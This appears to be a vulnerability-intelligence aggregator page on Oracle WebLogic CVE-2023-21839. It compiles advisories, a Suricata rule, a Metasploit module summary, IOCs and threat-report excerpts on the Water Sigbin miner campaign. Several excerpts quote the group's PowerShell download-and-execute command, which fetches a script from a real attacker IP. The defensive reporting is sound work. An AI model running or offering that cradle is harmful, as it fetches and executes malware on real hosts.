CVE-2023-21839
published 2023-01-18CVE-2023-21839: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0…
PriorityP193high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-05-22
Exploited in the wild
EPSS
99.81%
100.0th percentile
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
AES Key: 5D8D6871C3D59D855616603F686713AC48BF2351F6182EA282E1D84CBB15B94F / AES IV: CAAD009AC0881FE2A89F80CEEA6D1B6
- →Detect exploitation of CVE-2023-21839 via T3/IIOP protocol: monitor for unauthenticated inbound connections on port 7001 using T3 or IIOP, especially crafted JNDI/LDAP referral requests using the weblogic.deployment.jms.ForeignOpaqueReference class. ↗
- →Hunt for Water Sigbin's hex-encoded URL technique: attackers encode C2 IP addresses in hexadecimal (e.g., 0xb9ac8092 = 185.172.128.146) within PowerShell IEX download cradles to evade URL-based detection. ↗
- →Detect HTTP traffic over port 443 (non-TLS) as a stealthy C2 channel used by Water Sigbin to blend with HTTPS traffic. ↗
- →Alert on creation of a process named cvtres.exe spawned from non-standard parent processes or from the path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe as a sign of process injection by the second-stage loader. ↗
- →Detect fileless execution via .NET reflection in PowerShell: look for use of [System.Reflection.Assembly] combined with AES decryption and GZip decompression in PowerShell scripts, indicative of in-memory payload loading. ↗
- →Hunt for the mutex value 6cbe41284f6a992cc0534b as an indicator of active PureCrypter loader infection on a host. ↗
- →Monitor for scheduled tasks registered under Microsoft\Windows\Name folder configured to run at startup/login, and for Add-MpPreference exclusion commands targeting AppData\Roaming\Name\IsSynchronized.exe. ↗
- →Check Point IPS signature available for this CVE: 'Oracle WebLogic Server Improper Access Control (CVE-2023-21839)'. ↗
- ·The PureCrypter loader version observed is V6.0.7D; the AES key/IV and mutex are specific to this campaign sample and may change across versions or campaigns. ↗
- ·All payloads are protected with .NET Reactor obfuscation and incorporate anti-debugging techniques, which may hinder static analysis and signature-based detection. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
vendor_oracle7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f8x3-c29w-wfmj: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core)
ghsa_unreviewed·2023-01-18
CVE-2023-21839 [HIGH] CWE-306 GHSA-f8x3-c29w-wfmj: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
VulnCheck
Oracle WebLogic Server Unspecified Vulnerability
vulncheck·2023·CVSS 7.5
CVE-2023-21839 [HIGH] Oracle WebLogic Server Unspecified Vulnerability
Oracle WebLogic Server Unspecified Vulnerability
Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://blog.eclecticiq.com/chinese-threat-actor-used-modified-cobalt-strike-variant-to-attack-taiwanese-critical-infrastructure; https://go.crowdstrike.com/rs/281-OBQ-266/images/report-crowdstrike-2023-threat-hunting-report.pdf; https://www.rapid7.com/globalassets/_pdfs/research/rapid7_2024_attack_intelligence_report.pdf; https://www.broadcom.com/support/security-center/p
CISA
Oracle WebLogic Server Unspecified Vulnerability
cisa·2023-05-01·CVSS 7.5
CVE-2023-21839 [HIGH] Oracle WebLogic Server Unspecified Vulnerability
Vulnerability: Oracle WebLogic Server Unspecified Vulnerability
Affected: Oracle WebLogic Server
Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server.
Required Action: Apply updates per vendor instructions.
Notes: https://www.oracle.com/security-alerts/cpujan2023.html; https://nvd.nist.gov/vuln/detail/CVE-2023-21839
Remediation Due Date: 2023-05-22
Oracle
Oracle Oracle Fusion Middleware Risk Matrix: Core — CVE-2023-21839
vendor_oracle·2023-01-15·CVSS 7.5
CVE-2023-21839 [HIGH] Oracle Oracle Fusion Middleware Risk Matrix: Core — CVE-2023-21839
Oracle Oracle Fusion Middleware Risk Matrix: Core vulnerability
CVE: CVE-2023-21839
CVSS: 7.5
Protocol: T3, IIOP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2023 (JAN 2023)
Suricata
ET WEB_SERVER Oracle WebLogic Unauthenticated IIOP/T3 Remote Code Execution (CVE-2023-21839)
suricata·2025-10-27·CVSS 7.5
CVE-2023-21839 [HIGH] ET WEB_SERVER Oracle WebLogic Unauthenticated IIOP/T3 Remote Code Execution (CVE-2023-21839)
ET WEB_SERVER Oracle WebLogic Unauthenticated IIOP/T3 Remote Code Execution (CVE-2023-21839)
Rule: alert tcp any any -> $HOME_NET 7001 (msg:"ET WEB_SERVER Oracle WebLogic Unauthenticated IIOP/T3 Remote Code Execution (CVE-2023-21839)"; flow:established,to_server; content:"GIOP|01 02 00 00|"; startswith; content:"rebind_any"; content:"weblogic|2e|jndi|2e|internal|2e|ForeignOpaqueReference"; fast_pattern; content:"ldap|3a 2f 2f|"; reference:url,packetstorm.news/files/id/172882; reference:cve,2023-21839; classtype:misc-attack; sid:2065403; rev:1; metadata:affected_product Oracle_WebLogic, attack_target Networking_Equipment, created_at 2025_10_27, cve CVE_2023_21839, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_N
Metasploit
Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization
metasploit
Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization
Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization
Oracle Weblogic 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 prior to the Jan 2023 security update are vulnerable to an unauthenticated remote code execution vulnerability due to a post deserialization vulnerability. This occurs when an attacker serializes a "ForeignOpaqueReference" class object, deserializes it on the target, and then post deserialization, calls the object's "getReferent()" method, which will make use of the "ForeignOpaqueReference" class's "remoteJNDIName" variable, which is under the attackers control, to do a remote loading of the JNDI address specified by "remoteJNDIName" via the "lookup()" function. This can in turn lead to a deserialization vulnerability whereby an attacker su
Nuclei
Oracle WebLogic Server - Unauthorized Access
nuclei·CVSS 7.5
CVE-2023-21839 [HIGH] Oracle WebLogic Server - Unauthorized Access
Oracle WebLogic Server - Unauthorized Access
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
Template:
id: CVE-2023-21839
info:
name: Oracle WebLogic Server - Unauthorized Access
author: daffainfo
severity: high
description: |
Vulnerability in the Oracle WebL
Trendmicro
Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer
blogs_trendmicro·2024-06-28·CVSS 7.4
CVE-2017-3506 [HIGH] Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer
Exploits & Vulnerabilities
# Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer
We analyze the multi-stage loading technique used by Water Sigbin to deliver the PureCrypter loader and XMRIG crypto miner.
By: Ahmed Mohamed Ibrahim , Shubham Singh, Sunil Bharti
2024/06/28
Read time: ( words)
Save to Folio
## Summary
- Water Sigbin continues to exploit CVE-2017-3506 and CVE-2023-21839 to deploy cryptocurrency miners via a PowerShell script.
- The threat actor employs fileless execution techniques, using DLL reflective and process injection, allowing the malware code to run solely in memory and avoid disk-based detection mechanisms.
- This blog entry details the multi-stage loading technique that Water Sigbin uses to deliver the PureCrypter loader and XMRig crypt
Checkpoint
3rd June – Threat Intelligence Report
blogs_checkpoint·2024-06-03
CVE-2024-24919 3rd June – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 3rd June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 3rd June, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
ShinyHunters, a notorious cybercrime gang offered for sale on a cybercrime forum data of Ticketmaster, ticket sales and distribution company, and of Santander bank. The alleged breaches have resulted in the potential exposure of personal data belonging to millions of customers. Some assumption claim that actor gained access to Ti
Trendmicro
Decoding Water Sigbin's Latest Obfuscation Tricks
blogs_trendmicro·2024-05-30·CVSS 7.5
[HIGH] Decoding Water Sigbin's Latest Obfuscation Tricks
APT & Targeted Attacks
## Decoding Water Sigbin's Latest Obfuscation Tricks
Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.
By: Sunil Bharti 2024/05/30 Read time: ( words)
Save to Folio
The base64-encoded string in the attack payload is the following:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')"
Meanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.
For this exploit, the base64 encoded string in attack payload is:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://185.172.128.146:443/bin.ps1')"
We found ex
Trendmicro
Decoding Water Sigbin's Latest Obfuscation Tricks
blogs_trendmicro·2024-05-30·CVSS 7.5
[HIGH] Decoding Water Sigbin's Latest Obfuscation Tricks
APT und gezielte Angriffe
## Decoding Water Sigbin's Latest Obfuscation Tricks
Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.
By: Sunil Bharti May 30, 2024 Read time: ( words)
Save to Folio
The base64-encoded string in the attack payload is the following:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')"
Meanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.
For this exploit, the base64 encoded string in attack payload is:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://185.172.128.146:443/bin.ps1')"
We fou
Trendmicro
Decoding Water Sigbin's Latest Obfuscation Tricks
blogs_trendmicro·2024-05-30·CVSS 7.4
CVE-2017-3506 [HIGH] Decoding Water Sigbin's Latest Obfuscation Tricks
APT & Targeted Attacks
# Decoding Water Sigbin's Latest Obfuscation Tricks
Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.
By: Sunil Bharti
2024/05/30
Read time: ( words)
Save to Folio
# Summary
- Water Sigbin exploited the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner via a PowerShell script.
- The gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery.
- The PowerShell script and the resulting batch file involved complex encoding, using environment variables to
Trendmicro
Decoding Water Sigbin's Latest Obfuscation Tricks
blogs_trendmicro·2024-05-30·CVSS 7.5
[HIGH] Decoding Water Sigbin's Latest Obfuscation Tricks
APT y ataques dirigidos
## Decoding Water Sigbin's Latest Obfuscation Tricks
Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.
By: Sunil Bharti May 30, 2024 Read time: ( words)
Save to Folio
The base64-encoded string in the attack payload is the following:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')"
Meanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.
For this exploit, the base64 encoded string in attack payload is:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://185.172.128.146:443/bin.ps1')"
We found
Trendmicro
Decoding Water Sigbin's Latest Obfuscation Tricks
blogs_trendmicro·2024-05-30·CVSS 7.5
[HIGH] Decoding Water Sigbin's Latest Obfuscation Tricks
APT & Targeted Attacks
## Decoding Water Sigbin's Latest Obfuscation Tricks
Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.
By: Sunil Bharti May 30, 2024 Read time: ( words)
Save to Folio
The base64-encoded string in the attack payload is the following:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')"
Meanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.
For this exploit, the base64 encoded string in attack payload is:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://185.172.128.146:443/bin.ps1')"
We found
Sentinelone
CVE-2023-21839: Oracle WebLogic Server Core Patch Advisory
blogs_sentinelone·2023-03-03·CVSS 7.5
CVE-2023-21839 [HIGH] CVE-2023-21839: Oracle WebLogic Server Core Patch Advisory
Recently, a vulnerability was discovered in Oracle WebLogic Server that can lead to remote code execution. This vulnerability, assigned with CVE-2023-21839, allows an attacker to gain unauthorized access to critical data and take over the vulnerable system.
This vulnerability affects supported versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 and is easily exploitable by an unauthenticated attacker with network access through T3 or IIOP.
This vulnerability is already being exploited in the wild, making it imperative that organizations take immediate action to protect their systems.
## About the CVE-2023-21839 vulnerability
CVE-2023-21839 is an information disclosure vulnerability that can be exploited for remote code execution. This vulnerability is present in Oracle WebLogic Server vers
Sentinelone
CVE-2023-21839: Oracle WebLogic Server Core Patch Advisory
blogs_sentinelone·2023-03-03·CVSS 7.5
CVE-2023-21839 [HIGH] CVE-2023-21839: Oracle WebLogic Server Core Patch Advisory
Recently, a vulnerability was discovered in Oracle WebLogic Server that can lead to remote code execution. This vulnerability, assigned with CVE-2023-21839, allows an attacker to gain unauthorized access to critical data and take over the vulnerable system.
This vulnerability affects supported versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 and is easily exploitable by an unauthenticated attacker with network access through T3 or IIOP.
This vulnerability is already being exploited in the wild, making it imperative that organizations take immediate action to protect their systems.
## About the CVE-2023-21839 vulnerability
CVE-2023-21839 is an information disclosure vulnerability that can be exploited for remote code execution. This vulnerability is present in Oracle WebLogic Server vers
Sentinelone
CVE-2023-20052: ClamAV XXE Vulnerability
blogs_sentinelone·2023-03-03·CVSS 5.3
CVE-2023-20052 [MEDIUM] CVE-2023-20052: ClamAV XXE Vulnerability
CVE-2023-20052 is a possible remote information leak vulnerability (XXE) in the DMG file parser of ClamAV. The issue affects versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier. Attackers can exploit this vulnerability to gain unauthorized access to sensitive data, execute malicious code, and cause denial of service attacks.
## Understanding the CVE-2023-20052 ClamAV XXE Vulnerability
The vulnerability is classified as an XML external entity injection (XXE) vulnerability with a CVSS score of 5.3 , which is considered medium .
ClamAV is vulnerable to an XML external entity injection (XXE) attack when processing XML data caused by enabling an XML entity substitution. By sending a specially crafted DMG file to ClamAV, which scans this document and executes the embedded
Checkpoint
27th February – Threat Intelligence Report
blogs_checkpoint·2023-02-27
CVE-2023-20858 27th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 27th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 27th February, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
Stanford University experienced a data breach in which files containing Economics Ph.D. program admission information were leaked. Personal and health information of 897 applicants might have been exposed.
Dish Network, a major American TV and satellite broadcast provider, had been experiencing an unexplained outage with
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
GreyNoise Round Up: Product Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Threat Intel
Water Sigbin
threat_intel·CVSS 7.4
CVE-2017-3506 [HIGH] Water Sigbin
# Threat Actor: Water Sigbin
## Description
The 8220 Gang, also known as Water Sigbin, is a threat actor group that focuses on deploying cryptocurrency-mining malware. They exploit vulnerabilities in Oracle WebLogic servers, such as CVE-2017-3506 and CVE-2023-21839, to deliver cryptocurrency miners using PowerShell scripts. The group has demonstrated a sophisticated multistage loading technique to deploy the PureCrypter loader and XMRIG crypto miner. They are known for using obfuscation techniques, such as hexadecimal encoding and code obfuscation, to evade detection and compromise systems.
Greynoiseio
KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
blogs_greynoiseio·CVSS 9.0
[CRITICAL] KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
arXiv
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
arxiv_fulltext·2025-02-16
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
Yuning Jiang
[email protected]
0000-0003-4791-8452
National University of Singapore
Singapore
Nay Oo
[email protected]
NCS Cyber Special Ops R&D
Singapore
Qiaoran Meng
[email protected]
National University of Singapore
Singapore
Hoon Wei Lim
[email protected]
NCS Cyber Special Ops R&D
Singapore
Biplab Sikdar
[email protected]
National University of Singapore
Singapore
Jiang et al.
## Abstract
As interconnected systems proliferate, safeguarding complex infrastructures against an escalating array of cyber threats has become an urgent challenge. The growing number of vulnerabilities, coupled with resource constraints, makes addressing every vulnerability impractical, thereby rende
http://packetstormsecurity.com/files/172882/Oracle-Weblogic-PreAuth-Remote-Command-Execution.htmlhttps://www.oracle.com/security-alerts/cpujan2023.htmlhttp://packetstormsecurity.com/files/172882/Oracle-Weblogic-PreAuth-Remote-Command-Execution.htmlhttps://www.oracle.com/security-alerts/cpujan2023.htmlhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-21839
2023-01-18
Published
2023-05-01
Added to CISA KEV
Exploited in the wild